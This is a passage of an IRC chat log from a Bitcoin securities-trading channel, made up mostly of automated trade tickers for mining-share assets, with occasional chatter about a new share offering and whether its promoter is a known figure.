BTC [+] Aug 09 20:23:52 [BTCTC] [LABCOIN] 2 @ 0.001399 = 0.0028 BTC [+] Aug 09 20:23:53 [BTCTC] [LABCOIN] 1 @ 0.001399 BTC [+] Aug 09 20:23:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.03964 = 0.1982 BTC [+] Aug 09 20:24:04 the daily rise Aug 09 20:24:11 [BTCTC] [LABCOIN] 5 @ 0.001386 = 0.0069 BTC [-] Aug 09 20:25:12 pankkake i wonder what the real story is there. Aug 09 20:27:18 [BTCTC] [TAT.ASICMINER] 9 @ 0.03965 = 0.3569 BTC [+] Aug 09 20:27:57 [BTCTC] [TAT.ASICMINER] 16 @ 0.03997 = 0.6395 BTC [+] Aug 09 20:28:11 [BTCTC] [DMS.MINING] 20 @ 0.004599 = 0.092 BTC [+] Aug 09 20:31:03 [HAVELOCK] [AM100] 2 @ 0.0355 = 0.071 BTC [-] Aug 09 20:35:17 [BTCTC] [ACTIVEMINING] 50 @ 0.00548 = 0.274 BTC [+] Aug 09 20:36:10 [BTCTC] [ACTIVEMINING] 30 @ 0.005477 = 0.1643 BTC [-] Aug 09 20:37:44 [BTCTC] [BASIC-MINING] 4 @ 0.276 = 1.104 BTC [-] Aug 09 20:37:49 [MPEX] [S.MPOE] 3438 @ 0.000837 = 2.8776 BTC [+] Aug 09 20:37:50 [MPEX] [S.MPOE] 6900 @ 0.00083524 = 5.7632 BTC [-] Aug 09 20:37:53 [MPEX] [S.MPOE] 1936 @ 0.00083417 = 1.615 BTC [-] Aug 09 20:38:20 [BTCTC] [ASICMINER-PT] 2 @ 3.929 = 7.858 BTC [+] Aug 09 20:38:30 [HAVELOCK] [XBOND] 1240 @ 0.00104688 = 1.2981 BTC [+] Aug 09 20:38:35 [BTCTC] [ACTIVEMINING] 2 @ 0.005468 = 0.0109 BTC [-] Aug 09 20:38:36 [BTCTC] [ACTIVEMINING] 6 @ 0.005468 = 0.0328 BTC [-] Aug 09 20:38:37 [BTCTC] [ACTIVEMINING] 1 @ 0.005469 BTC [+] Aug 09 20:39:17 [HAVELOCK] [AM100] 14 @ 0.0355 = 0.497 BTC [-] Aug 09 20:39:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.03997 = 0.9993 BTC [+] Aug 09 20:39:38 [HAVELOCK] [XBOND] 106 @ 0.00104688 = 0.111 BTC [+] Aug 09 20:39:41 [HAVELOCK] [XBOND] 11 @ 0.00104687 = 0.0115 BTC [-] Aug 09 20:39:42 [BTCTC] [DMS.PURCHASE] 85 @ 0.02817 = 2.3945 BTC [-] Aug 09 20:42:09 [BTCTC] [ASICMINER-PT] 4 @ 3.927 = 15.708 BTC [-] Aug 09 20:42:11 [BTCTC] [ASICMINER-PT] 3 @ 3.928 = 11.784 BTC [+] Aug 09 20:42:12 [BTCTC] [ASICMINER-PT] 7 @ 3.93 = 27.51 BTC [+] Aug 09 20:48:25 [BTCTC] [ACTIVEMINING] 6 @ 0.005458 = 0.0327 BTC [-] Aug 09 20:48:26 [BTCTC] [ACTIVEMINING] 2 @ 0.005459 = 0.0109 BTC [+] Aug 09 20:48:28 [BTCTC] [ACTIVEMINING] 2 @ 0.005459 = 0.0109 BTC [+] Aug 09 20:49:08 [BTCTC] [ACTIVEMINING] 2 @ 0.005458 = 0.0109 BTC [-] Aug 09 20:49:58 [BTCTC] [NASTY-PT] 6 @ 0.004165 = 0.025 BTC [-] Aug 09 20:51:42 [HAVELOCK] [XBOND] 1 @ 0.0010469 BTC [+] Aug 09 20:54:20 [BTCTC] [BTCGARDEN] 80 @ 0.01582 = 1.2656 BTC [-] Aug 09 20:55:38 [BTCTC] [BTCGARDEN] 37 @ 0.01581 = 0.585 BTC [-] Aug 09 20:56:28 [BTCTC] [ASICMINER-PT] 1 @ 3.909 BTC [-] Aug 09 20:58:00 [BTCTC] [TAT.ASICMINER] 67 @ 0.03826 = 2.5634 BTC [-] Aug 09 20:58:36 [BTCTC] [TAT.ASICMINER] 33 @ 0.03825 = 1.2623 BTC [-] Aug 09 20:59:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.03825 = 0.1913 BTC [-] Aug 09 20:59:28 [BTCTC] [ASICMINER-PT] 1 @ 3.909 BTC [-] Aug 09 21:01:48 [BTCTC] [B.YABMC] 100 @ 0.0024 = 0.24 BTC [+] Aug 09 21:01:49 [BTCTC] [B.YABMC] 216 @ 0.002597 = 0.561 BTC [+] Aug 09 21:01:51 [BTCTC] [B.YABMC] 300 @ 0.002598 = 0.7794 BTC [+] Aug 09 21:01:52 [BTCTC] [B.YABMC] 100 @ 0.0026 = 0.26 BTC [+] Aug 09 21:04:41 [BTCTC] [BTCGARDEN] 1 @ 0.01581 BTC [-] Aug 09 21:04:42 [BTCTC] [BTCGARDEN] 9 @ 0.01581 = 0.1423 BTC [-] Aug 09 21:05:25 [HAVELOCK] [VTX] 1 @ 0.51 BTC [+] Aug 09 21:05:27 [HAVELOCK] [VTX] 4 @ 0.515 = 2.06 BTC [+] Aug 09 21:10:30 [HAVELOCK] [XBOND] 28 @ 0.0010469 = 0.0293 BTC [+] Aug 09 21:14:36 [BTCTC] [DMS.MINING] 1 @ 0.004597 BTC [-] Aug 09 21:17:20 [BTCTC] [TAT.ASICMINER] 8 @ 0.0399 = 0.3192 BTC [+] Aug 09 21:17:46 [BTCTC] [ASICMINER-PT] 1 @ 3.849 BTC [-] Aug 09 21:21:17 [BTCTC] [ASICMINER-PT] 1 @ 3.849 BTC [-] Aug 09 21:23:34 [HAVELOCK] [XBOND] 33 @ 0.0010469 = 0.0345 BTC [+] Aug 09 21:24:55 [MPEX] [S.MPOE] 6400 @ 0.00083297 = 5.331 BTC [-] Aug 09 21:24:57 [MPEX] [S.MPOE] 1300 @ 0.00083209 = 1.0817 BTC [-] Aug 09 21:26:01 [BTCTC] [DMS.MINING] 27 @ 0.0043 = 0.1161 BTC [-] Aug 09 21:27:11 [HAVELOCK] [XBOND] 100 @ 0.0010469 = 0.1047 BTC [+] Aug 09 21:29:02 [HAVELOCK] [SMG] 3 @ 0.000237 = 0.0007 BTC [+] Aug 09 21:29:07 Ronald Reagan: I do not like Sweden, they support communism. Aug 09 21:29:07 Minister: Sir, but Sweden are anti-communist, Sir. Aug 09 21:29:07 Ronald Reagan: I do not care what kind of communists they are. Aug 09 21:29:20 lol Aug 09 21:29:33 [HAVELOCK] [XBOND] 838 @ 0.0010469 = 0.8773 BTC [+] Aug 09 21:30:09 [BTCTC] [TAT.ASICMINER] 15 @ 0.03895 = 0.5843 BTC [-] Aug 09 21:30:15 [HAVELOCK] [XBOND] 1000 @ 0.001047 = 1.047 BTC [+] Aug 09 21:30:36 [BTCTC] [BMF] 30 @ 0.03301 = 0.9903 BTC [-] Aug 09 21:30:47 [HAVELOCK] [AM100] 4 @ 0.0369 = 0.1476 BTC [+] Aug 09 21:30:56 [HAVELOCK] [AM100] 10 @ 0.0369 = 0.369 BTC [+] Aug 09 21:31:54 [HAVELOCK] [LABCO] 10 @ 0.00145 = 0.0145 BTC [+] Aug 09 21:32:05 [HAVELOCK] [LABCO] 50 @ 0.0014599 = 0.073 BTC [+] Aug 09 21:32:15 [HAVELOCK] [LABCO] 50 @ 0.00147 = 0.0735 BTC [+] Aug 09 21:34:07 [HAVELOCK] [XBOND] 800 @ 0.001047 = 0.8376 BTC [+] Aug 09 21:35:58 [HAVELOCK] [AM100] 27 @ 0.03695 = 0.9977 BTC [+] Aug 09 21:36:20 [BTCTC] [LTC-ATF.B2] 21 @ 0.01043 = 0.219 BTC [-] Aug 09 21:36:22 mircea, I think it is a statement of the strength of human generosity that we let the least of us rule the most of us. Aug 09 21:36:45 We honor our delicious idiots by putting them in charge Aug 09 21:37:24 [BTCTC] [LABCOIN] 8 @ 0.001358 = 0.0109 BTC [-] Aug 09 21:40:04 [BTCTC] [ASICMINER-PT] 1 @ 3.801 BTC [-] Aug 09 21:40:06 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 09 21:40:07 [BTCTC] [ASICMINER-PT] 3 @ 3.76 = 11.28 BTC [-] Aug 09 21:40:08 [BTCTC] [ASICMINER-PT] 1 @ 3.756 BTC [-] Aug 09 21:40:09 [BTCTC] [ASICMINER-PT] 1 @ 3.753 BTC [-] Aug 09 21:40:11 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [-] Aug 09 21:40:12 [BTCTC] [ASICMINER-PT] 2 @ 3.74 = 7.48 BTC [-] Aug 09 21:40:13 [BTCTC] [ASICMINER-PT] 1 @ 3.74 BTC [-] Aug 09 21:41:13 [BTCTC] [BITVPS] 40 @ 0.00201 = 0.0804 BTC [-] Aug 09 21:45:13 [BTCTC] [DMS.MINING] 1 @ 0.004597 BTC [+] Aug 09 21:45:23 [BTCTC] [ACTIVEMINING] 8 @ 0.0054 = 0.0432 BTC [-] Aug 09 21:45:29 [BTCTC] [ACTIVEMINING] 143 @ 0.005496 = 0.7859 BTC [+] Aug 09 21:45:33 [BTCTC] [ACTIVEMINING] 500 @ 0.005497 = 2.7485 BTC [+] Aug 09 21:47:06 [BTCTC] [ASICMINER-PT] 2 @ 3.769 = 7.538 BTC [+] Aug 09 21:50:33 [BTCTC] [NASTY-PT] 1 @ 0.004165 BTC [-] Aug 09 21:51:24 [BTCTC] [LABCOIN] 3 @ 0.001348 = 0.004 BTC [-] Aug 09 21:51:46 [BTCTC] [DMS.MINING] 84 @ 0.004598 = 0.3862 BTC [+] Aug 09 21:51:47 [BTCTC] [DMS.MINING] 50 @ 0.0046 = 0.23 BTC [+] Aug 09 21:51:48 [BTCTC] [DMS.MINING] 42 @ 0.004609 = 0.1936 BTC [+] Aug 09 21:51:50 [BTCTC] [DMS.MINING] 100 @ 0.00461 = 0.461 BTC [+] Aug 09 21:51:51 [BTCTC] [DMS.MINING] 100 @ 0.00463 = 0.463 BTC [+] Aug 09 21:51:51 [BTCTC] [DMS.MINING] 100 @ 0.00465 = 0.465 BTC [+] Aug 09 21:51:52 [BTCTC] [DMS.MINING] 100 @ 0.00466 = 0.466 BTC [+] Aug 09 21:51:53 [BTCTC] [DMS.MINING] 167 @ 0.004678 = 0.7812 BTC [+] Aug 09 21:51:54 [BTCTC] [DMS.MINING] 100 @ 0.00468 = 0.468 BTC [+] Aug 09 21:51:55 [BTCTC] [DMS.MINING] 100 @ 0.00469 = 0.469 BTC [+] Aug 09 21:51:56 [BTCTC] [DMS.MINING] 100 @ 0.0047 = 0.47 BTC [+] Aug 09 21:52:16 [BTCTC] [LABCOIN] 3 @ 0.001347 = 0.004 BTC [-] Aug 09 21:52:28 [BTCTC] [LABCOIN] 30 @ 0.001348 = 0.0404 BTC [+] Aug 09 21:53:45 [BTCTC] [LABCOIN] 15 @ 0.001358 = 0.0204 BTC [+] Aug 09 21:53:46 [BTCTC] [LABCOIN] 235 @ 0.001359 = 0.3194 BTC [+] Aug 09 21:53:48 [BTCTC] [LABCOIN] 20 @ 0.001361 = 0.0272 BTC [+] Aug 09 21:53:49 [BTCTC] [LABCOIN] 5 @ 0.001372 = 0.0069 BTC [+] Aug 09 21:53:49 [BTCTC] [LABCOIN] 40 @ 0.001373 = 0.0549 BTC [+] Aug 09 21:53:50 [BTCTC] [LABCOIN] 143 @ 0.001399 = 0.2001 BTC [+] Aug 09 21:53:51 [BTCTC] [LABCOIN] 64 @ 0.0014 = 0.0896 BTC [+] Aug 09 21:53:52 [BTCTC] [LABCOIN] 250 @ 0.0014 = 0.35 BTC [+] Aug 09 21:53:53 [BTCTC] [LABCOIN] 623 @ 0.0014 = 0.8722 BTC [+] Aug 09 21:56:46 [MPEX] [S.MPOE] 3600 @ 0.00083311 = 2.9992 BTC [+] Aug 09 21:57:29 [BTCTC] [BASIC-MINING] 1 @ 0.28 BTC [+] Aug 09 21:57:57 [BTCTC] [ACTIVEMINING] 800 @ 0.0051 = 4.08 BTC [-] Aug 09 21:58:14 [BTCTC] [BASIC-MINING] 6 @ 0.2801 = 1.6806 BTC [+] Aug 09 21:58:15 [BTCTC] [BASIC-MINING] 2 @ 0.281 = 0.562 BTC [+] Aug 09 21:58:17 [BTCTC] [BASIC-MINING] 1 @ 0.283 BTC [+] Aug 09 21:59:03 [BTCTC] [BASIC-MINING] 12 @ 0.2837 = 3.4044 BTC [+] Aug 09 22:00:48 [BTCTC] [PAJKA.BOND] 2 @ 0.017 = 0.034 BTC [+] Aug 09 22:01:54 [BTCTC] [ASICMINER-PT] 1 @ 3.79 BTC [+] Aug 09 22:02:29 [BTCTC] [DMS.PURCHASE] 50 @ 0.02817 = 1.4085 BTC [-] Aug 09 22:02:52 [BTCTC] [ASICMINER-PT] 5 @ 3.79 = 18.95 BTC [+] Aug 09 22:03:05 [BTCTC] [ACTIVEMINING] 68 @ 0.00537 = 0.3652 BTC [+] Aug 09 22:03:07 [BTCTC] [ACTIVEMINING] 50 @ 0.005362 = 0.2681 BTC [-] Aug 09 22:03:08 [BTCTC] [ACTIVEMINING] 392 @ 0.00531 = 2.0815 BTC [-] Aug 09 22:03:21 [BTCTC] [ASICMINER-PT] 5 @ 3.79 = 18.95 BTC [+] Aug 09 22:03:34 [BTCTC] [BTCGARDEN] 35 @ 0.01581 = 0.5534 BTC [-] Aug 09 22:06:25 [BTCTC] [BASIC-MINING] 4 @ 0.29 = 1.16 BTC [+] Aug 09 22:06:27 [BTCTC] [BASIC-MINING] 6 @ 0.2977 = 1.7862 BTC [+] Aug 09 22:08:14 [BTCTC] [DMS.MINING] 4 @ 0.0046 = 0.0184 BTC [-] Aug 09 22:08:15 [BTCTC] [DMS.MINING] 4 @ 0.0045 = 0.018 BTC [-] Aug 09 22:08:16 [BTCTC] [DMS.MINING] 23 @ 0.0043 = 0.0989 BTC [-] Aug 09 22:08:17 [BTCTC] [DMS.MINING] 1 @ 0.0043 BTC [-] Aug 09 22:08:34 [BTCTC] [DMS.MINING] 7 @ 0.0043 = 0.0301 BTC [-] Aug 09 22:09:42 [BTCTC] [DMS.MINING] 11 @ 0.0043 = 0.0473 BTC [-] Aug 09 22:11:14 [BTCTC] [NASTY-PT] 2 @ 0.004165 = 0.0083 BTC [-] Aug 09 22:14:35 [BTCTC] [ASICMINER-PT] 1 @ 3.837 BTC [+] Aug 09 22:14:36 [BTCTC] [ASICMINER-PT] 1 @ 3.838 BTC [+] Aug 09 22:15:47 [BTCTC] [ASICMINER-PT] 1 @ 3.84 BTC [+] Aug 09 22:19:06 [HAVELOCK] [SDSTM] 5 @ 0.0056202 = 0.0281 BTC [+] Aug 09 22:19:10 [HAVELOCK] [SDSTM] 1 @ 0.00562 BTC [-] Aug 09 22:19:15 [HAVELOCK] [SDSTM] 4 @ 0.005603 = 0.0224 BTC [-] Aug 09 22:19:25 [HAVELOCK] [SDSTM] 19 @ 0.005602 = 0.1064 BTC [-] Aug 09 22:19:30 [HAVELOCK] [SDSTM] 19 @ 0.005563 = 0.1057 BTC [-] Aug 09 22:19:35 [HAVELOCK] [SDSTM] 19 @ 0.0055629 = 0.1057 BTC [-] Aug 09 22:19:39 [HAVELOCK] [SDSTM] 3 @ 0.00556 = 0.0167 BTC [-] Aug 09 22:19:44 [HAVELOCK] [SDSTM] 8 @ 0.00555 = 0.0444 BTC [-] Aug 09 22:20:04 [BTCTC] [ASICMINER-PT] 1 @ 3.841 BTC [+] Aug 09 22:20:06 [BTCTC] [ASICMINER-PT] 14 @ 3.84 = 53.76 BTC [-] Aug 09 22:20:32 [BTCTC] [ASICMINER-PT] 1 @ 3.84 BTC [-] Aug 09 22:21:01 [BTCTC] [ASICMINER-PT] 5 @ 3.774 = 18.87 BTC [-] Aug 09 22:21:52 [BTCTC] [ASICMINER-PT] 4 @ 3.752 = 15.008 BTC [-] Aug 09 22:21:54 [BTCTC] [ASICMINER-PT] 1 @ 3.751 BTC [-] Aug 09 22:21:55 [BTCTC] [ASICMINER-PT] 7 @ 3.75 = 26.25 BTC [-] Aug 09 22:23:24 damn asicminer under 4btc Aug 09 22:23:58 [BTCTC] [BTCGARDEN] 6 @ 0.01581 = 0.0949 BTC [-] Aug 09 22:25:38 [BTCTC] [BTCGARDEN] 664 @ 0.0158 = 10.4912 BTC [-] Aug 09 22:27:05 [BTCTC] [ACTIVEMINING] 15 @ 0.005377 = 0.0807 BTC [+] Aug 09 22:30:52 [BTCTC] [NASTY-PT] 154 @ 0.004165 = 0.6414 BTC [-] Aug 09 22:31:26 [BTCTC] [NASTY-PT] 85 @ 0.004166 = 0.3541 BTC [+] Aug 09 22:31:54 [BTCTC] [ACTIVEMINING] 68 @ 0.005458 = 0.3711 BTC [+] Aug 09 22:31:55 [BTCTC] [ACTIVEMINING] 15 @ 0.005459 = 0.0819 BTC [+] Aug 09 22:31:57 [BTCTC] [ACTIVEMINING] 1 @ 0.005464 BTC [+] Aug 09 22:31:58 [BTCTC] [ACTIVEMINING] 106 @ 0.005513 = 0.5844 BTC [+] Aug 09 22:31:59 [BTCTC] [ACTIVEMINING] 1069 @ 0.005514 = 5.8945 BTC [+] Aug 09 22:34:57 [BTCTC] [BASIC-MINING] 3 @ 0.2943 = 0.8829 BTC [-] Aug 09 22:35:22 [BTCTC] [BASIC-MINING] 5 @ 0.2977 = 1.4885 BTC [+] Aug 09 22:36:35 [HAVELOCK] [AM100] 9 @ 0.03695 = 0.3326 BTC [+] Aug 09 22:37:07 [BTCTC] [ASICMINER-PT] 2 @ 3.761 = 7.522 BTC [+] Aug 09 22:37:09 [BTCTC] [ASICMINER-PT] 1 @ 3.76 BTC [-] Aug 09 22:37:15 [BTCTC] [ASICMINER-PT] 1 @ 3.729 BTC [-] Aug 09 22:37:16 [BTCTC] [ASICMINER-PT] 1 @ 3.726 BTC [-] Aug 09 22:41:12 [BTCTC] [ASICMINER-PT] 1 @ 3.704 BTC [-] Aug 09 22:43:07 [BTCTC] [TAT.ASICMINER] 67 @ 0.03816 = 2.5567 BTC [-] Aug 09 22:43:08 [BTCTC] [TAT.ASICMINER] 33 @ 0.03815 = 1.259 BTC [-] Aug 09 22:43:36 [BTCTC] [ASICMINER-PT] 1 @ 3.798 BTC [+] Aug 09 22:47:27 [HAVELOCK] [SMG] 5 @ 0.000207 = 0.001 BTC [-] Aug 09 22:48:52 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 09 22:54:52 [BTCTC] [PAJKA.BOND] 1 @ 0.01209 BTC [-] Aug 09 22:54:53 [BTCTC] [PAJKA.BOND] 3 @ 0.01202 = 0.0361 BTC [-] Aug 09 22:54:55 [BTCTC] [PAJKA.BOND] 5 @ 0.012 = 0.06 BTC [-] Aug 09 22:55:17 [BTCTC] [ACTIVEMINING] 1 @ 0.005667 BTC [+] Aug 09 22:55:18 [BTCTC] [ACTIVEMINING] 2 @ 0.005668 = 0.0113 BTC [+] Aug 09 22:57:14 [BTCTC] [TAT.MINIGAME] 4 @ 0.0002422 = 0.001 BTC [+] Aug 09 23:23:25 yeah just got that email Aug 09 23:23:39 i filed it under spam ;) Aug 09 23:24:13 thats fine Aug 09 23:24:18 as long as your buying :) Aug 09 23:25:38 probably will, when is it going live? Aug 09 23:26:19 its going to be on all 3 exchanges Aug 09 23:26:34 if ukyo ever gets this done, tomorrow on bitfunder Aug 09 23:27:06 btct same Aug 09 23:27:10 havelock on wednesday Aug 09 23:28:49 starting price on btct .03 too? Aug 09 23:29:49 [HAVELOCK] [XBOND] 9 @ 0.00104699 = 0.0094 BTC [-] Aug 09 23:29:58 [HAVELOCK] [XBOND] 1 @ 0.00104699 BTC [-] Aug 09 23:30:07 yes, same Aug 09 23:31:37 what are you selling? Aug 09 23:33:23 Can I transfer shares from your site to btct? :) Aug 09 23:34:52 dub www.smidge.com Aug 09 23:35:22 rulother yes you can, as we are listed everywhere you can choose which account to transfer to Aug 09 23:37:39 excellent, so I buy your pacakge of shares at .02 on your site and then xfer to btct where it's .03? :P Aug 09 23:37:43 smidge: well played usagi Aug 09 23:38:10 [BTCTC] [BTCGARDEN] 80 @ 0.0158 = 1.264 BTC [-] Aug 09 23:38:17 the pre-ipo shares are available until tomorrow and theyre .02, exactly Aug 09 23:38:23 ipo price is .03 Aug 09 23:38:42 and usagi is not in any way affiliated with smidge.com :) Aug 09 23:38:43 [HAVELOCK] [XBOND] 2 @ 0.0010351 = 0.0021 BTC [-] Aug 09 23:38:45 [HAVELOCK] [XBOND] 21 @ 0.00103505 = 0.0217 BTC [-] Aug 09 23:38:48 [HAVELOCK] [XBOND] 1 @ 0.001035 BTC [-] Aug 09 23:38:50 [HAVELOCK] [XBOND] 14 @ 0.001034 = 0.0145 BTC [-] Aug 09 23:38:51 although he tried to propose a massive share swap deal :) Aug 09 23:38:52 [HAVELOCK] [XBOND] 1 @ 0.001033 BTC [-] Aug 09 23:38:53 [HAVELOCK] [XBOND] 1 @ 0.001032 BTC [-] Aug 09 23:38:55 [HAVELOCK] [XBOND] 1 @ 0.0010311 BTC [-] Aug 09 23:38:57 [HAVELOCK] [XBOND] 110 @ 0.001031 = 0.1134 BTC [-] Aug 09 23:38:59 [HAVELOCK] [XBOND] 50 @ 0.001031 = 0.0516 BTC [-] Aug 09 23:39:01 [HAVELOCK] [XBOND] 49 @ 0.0010305 = 0.0505 BTC [-] Aug 09 23:39:03 [HAVELOCK] [XBOND] 112 @ 0.00103001 = 0.1154 BTC [-] Aug 09 23:39:05 [HAVELOCK] [XBOND] 678 @ 0.00103001 = 0.6983 BTC [-] Aug 09 23:39:07 [HAVELOCK] [XBOND] 2960 @ 0.00103 = 3.0488 BTC [-] Aug 09 23:39:13 which i denied weeks ago Aug 09 23:39:16 do you do share transfers between the exchanges? Aug 09 23:39:17 you're not usagi? Aug 09 23:39:31 dex nope Aug 09 23:40:24 So begins the Smidge.com Q&A Aug 09 23:40:38 pls use the official thread Aug 09 23:40:42 [16:38] you're not usagi? <<<< sorta wondered that myself at points Aug 09 23:40:53 lol tat Aug 09 23:41:01 similarity is scary Aug 09 23:41:27 because its a... fund? Aug 09 23:41:31 or? Aug 09 23:41:33 cuz all the mining Aug 09 23:41:45 cuz the iffy mgmt fee process Aug 09 23:42:07 what will you buy with all your new coins? Aug 09 23:42:16 more mining assets? Aug 09 23:42:27 even the writing style matches Aug 09 23:42:35 your typing and wirding sound like usagi Aug 09 23:42:44 writing Aug 09 23:42:55 the volumes of meaninless words Aug 09 23:42:59 how many push-ups do you do per day? Aug 09 23:44:09 if you have serious questions, pls use the official thread so that everyone can read up on it Aug 09 23:44:16 [BTCTC] [LABCOIN] 11 @ 0.001375 = 0.0151 BTC [-] Aug 09 23:44:33 and you can moderate tehm presumably Aug 09 23:44:59 [BTCTC] [BASIC-MINING] 1 @ 0.2968 BTC [-] Aug 09 23:45:25 why should i if theyre serious, i.e. not about push-ups and the like? Aug 09 23:45:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.03854 = 0.1542 BTC [+] Aug 09 23:46:25 because you are usagi? Aug 09 23:47:13 [HAVELOCK] [XBOND] 678 @ 0.00104698 = 0.7099 BTC [+] Aug 09 23:47:14 [HAVELOCK] [XBOND] 822 @ 0.00104699 = 0.8606 BTC [+] Aug 09 23:48:07 [BTCTC] [BTCGARDEN] 5 @ 0.0158 = 0.079 BTC [-] Aug 09 23:48:53 your scams^Wfunds have denied access to the exchanges, time to burn that persona and start again? Aug 09 23:49:18 word Aug 09 23:50:09 hmm he might really be usagi Aug 09 23:50:19 [BTCTC] [LABCOIN] 15 @ 0.001389 = 0.0208 BTC [+] Aug 09 23:50:21 [BTCTC] [LABCOIN] 1 @ 0.00139 BTC [+] Aug 09 23:50:31 [BTCTC] [LABCOIN] 6 @ 0.00139 = 0.0083 BTC [+] Aug 09 23:52:20 [HAVELOCK] [AM1] 1 @ 3.84 BTC [+] Aug 09 23:52:48 [BTCTC] [LABCOIN] 1 @ 0.00139 BTC [+] Aug 09 23:53:04 [HAVELOCK] [XBOND] 2000 @ 0.00104699 = 2.094 BTC [+] Aug 09 23:53:08 [HAVELOCK] [AM1] 1 @ 3.87 BTC [+] Aug 09 23:53:12 [BTCTC] [LABCOIN] 10 @ 0.001391 = 0.0139 BTC [+] Aug 09 23:54:04 [BTCTC] [LABCOIN] 3 @ 0.001393 = 0.0042 BTC [+] Aug 09 23:54:20 [HAVELOCK] [AM1] 1 @ 3.8997 BTC [+] Aug 09 23:54:51 [BTCTC] [BTCGARDEN] 3 @ 0.0159 = 0.0477 BTC [+] Aug 09 23:55:38 [BTCTC] [LABCOIN] 3 @ 0.001393 = 0.0042 BTC [+] Aug 09 23:56:22 [BTCTC] [LABCOIN] 20 @ 0.001394 = 0.0279 BTC [+] Aug 09 23:58:56 smidge: https://bitcointalk.org/index.php?topic=259772.msg2901143#msg2901143 Aug 10 00:04:52 is this from when usagi was a girl? http://tsukino.ca/bmf/2012/06/03/cognitive-model-fpga-performance/ Aug 10 00:05:04 http://tsukino.ca/bmf/2012/05/21/an-interview-with-gigavps-of-gigamining/ Aug 10 00:05:09 An Interview with gigavps of Gigamining | BMF Aug 10 00:06:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.03853 BTC [-] Aug 10 00:11:05 smells like bitcoin ddos season again Aug 10 00:11:29 [BTCTC] [DMS.SELLING] 4 @ 0.024 = 0.096 BTC [-] Aug 10 00:12:33 [BTCTC] [BASIC-MINING] 4 @ 0.2977 = 1.1908 BTC [+] Aug 10 00:12:34 [BTCTC] [BASIC-MINING] 16 @ 0.2979 = 4.7664 BTC [+] Aug 10 00:17:19 [MPEX] [S.MPOE] 9000 @ 0.00083258 = 7.4932 BTC [-] Aug 10 00:20:13 i think we pissed him/her off Aug 10 00:20:44 [BTCTC] [DMS.SELLING] 6 @ 0.02424 = 0.1454 BTC [+] Aug 10 00:21:02 [BTCTC] [DMS.MINING] 3 @ 0.004301 = 0.0129 BTC [+] Aug 10 00:21:41 [BTCTC] [ACTIVEMINING] 11 @ 0.005517 = 0.0607 BTC [-] Aug 10 00:22:01 [BTCTC] [DMS.MINING] 5 @ 0.004744 = 0.0237 BTC [+] Aug 10 00:22:42 [BTCTC] [LABCOIN] 1 @ 0.001393 BTC [-] Aug 10 00:22:54 [BTCTC] [DMS.PURCHASE] 6 @ 0.02817 = 0.169 BTC [-] Aug 10 00:24:26 [BTCTC] [DMS.MINING] 2 @ 0.004744 = 0.0095 BTC [+] Aug 10 00:24:37 [BTCTC] [LABCOIN] 1 @ 0.001393 BTC [-] Aug 10 00:24:38 [BTCTC] [LABCOIN] 9 @ 0.001394 = 0.0125 BTC [+] Aug 10 00:27:17 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.001901 = 0.038 BTC [-] Aug 10 00:29:08 [BTCTC] [BASIC-MINING] 1 @ 0.2973 BTC [-] Aug 10 00:29:52 [BTCTC] [DMS.MINING] 6 @ 0.004301 = 0.0258 BTC [-] Aug 10 00:31:42 [BTCTC] [ACTIVEMINING] 6 @ 0.005664 = 0.034 BTC [+] Aug 10 00:31:43 [BTCTC] [ACTIVEMINING] 45 @ 0.005665 = 0.2549 BTC [+] Aug 10 00:36:31 [BTCTC] [LABCOIN] 1 @ 0.001394 BTC [+] Aug 10 00:36:40 [BTCTC] [DMS.PURCHASE] 1 @ 0.02817 BTC [-] Aug 10 00:36:56 [BTCTC] [TAT.ASICMINER] 14 @ 0.0381 = 0.5334 BTC [-] Aug 10 00:37:24 [BTCTC] [ACTIVEMINING] 68 @ 0.005559 = 0.378 BTC [-] Aug 10 00:37:25 [BTCTC] [ACTIVEMINING] 30 @ 0.005558 = 0.1667 BTC [-] Aug 10 00:37:27 [BTCTC] [ACTIVEMINING] 50 @ 0.005557 = 0.2779 BTC [-] Aug 10 00:37:47 [BTCTC] [BASIC-MINING] 1 @ 0.2979 BTC [+] Aug 10 00:41:03 [BTCTC] [NASTY-PT] 1 @ 0.004168 BTC [+] Aug 10 00:46:32 [BTCTC] [NASTY-PT] 2 @ 0.004168 = 0.0083 BTC [+] Aug 10 00:46:52 [BTCTC] [BTC-BOND] 20 @ 0.009999 = 0.2 BTC [+] Aug 10 00:48:09 [BTCTC] [LABCOIN] 25 @ 0.001399 = 0.035 BTC [+] Aug 10 00:53:10 [BTCTC] [BTCGARDEN] 1 @ 0.0159 BTC [+] Aug 10 00:58:44 [BTCTC] [NASTY-PT] 14 @ 0.004167 = 0.0583 BTC [-] Aug 10 00:58:45 [BTCTC] [NASTY-PT] 31 @ 0.004168 = 0.1292 BTC [+] Aug 10 00:59:00 [BTCTC] [BASIC-MINING] 4 @ 0.2979 = 1.1916 BTC [+] Aug 10 00:59:46 [BTCTC] [DMS.MINING] 11 @ 0.004743 = 0.0522 BTC [+] Aug 10 00:59:46 [BTCTC] [DMS.MINING] 6 @ 0.004744 = 0.0285 BTC [+] Aug 10 01:01:12 whats wrong with bitfunder? Aug 10 01:01:28 [BTCTC] [PAJKA.BOND] 22 @ 0.01101 = 0.2422 BTC [-] Aug 10 01:02:11 [BTCTC] [DMS.MINING] 20 @ 0.004743 = 0.0949 BTC [-] Aug 10 01:03:08 [BTCTC] [DMS.MINING] 31 @ 0.004744 = 0.1471 BTC [+] Aug 10 01:03:19 [BTCTC] [BTCGARDEN] 2 @ 0.0159 = 0.0318 BTC [+] Aug 10 01:03:20 [BTCTC] [DMS.SELLING] 11 @ 0.02364 = 0.26 BTC [-] Aug 10 01:03:21 [BTCTC] [BTCGARDEN] 30 @ 0.0159 = 0.477 BTC [+] Aug 10 01:04:00 [BTCTC] [DMS.SELLING] 4 @ 0.02364 = 0.0946 BTC [-] Aug 10 01:04:01 [BTCTC] [DMS.SELLING] 7 @ 0.02364 = 0.1655 BTC [-] Aug 10 01:04:03 [BTCTC] [DMS.PURCHASE] 11 @ 0.02817 = 0.3099 BTC [-] Aug 10 01:04:41 [BTCTC] [DMS.SELLING] 6 @ 